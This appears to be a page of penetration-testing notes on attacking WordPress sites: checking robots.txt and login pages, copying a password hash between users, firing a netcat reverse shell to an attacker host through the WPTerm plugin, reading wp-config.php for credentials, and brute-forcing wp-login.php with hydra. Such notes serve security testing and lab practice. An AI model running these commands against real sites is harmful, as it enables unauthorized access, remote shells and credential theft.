Extra commands

[1] always check for robots.txt

/robots.txt /wordpress/robots.txt

[2] if you find the domain, add it to /etc/hosts

[3]default login pages

check /wordpress/wp-login.php

[4] Wordpress Bitnami

If you have access to control panel, you can copy and paste the password hash of a previously PWD user into another user

[5] Check in tools if WPTERM is installed, basically a mock terminal

Just fire off a reverse shell to your kali host

nc -e /bin/bash 10.10.10.10 1234

nc -nvlp 1234

[6]Once you have access to dashboard, check info under : tools โ†’ Site Health โ†’ Info

[7] Post Exploitation:

cd /var/www/html

#Check out the wp-config.php file for creds/configurations

#Also: cd /var/www/html/wordpress

[8] Crack admin console with hydra

hydra -l admin -P pass.txt > $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

PreviousWordpress EnumerationNextWPScan one-liners

Last updated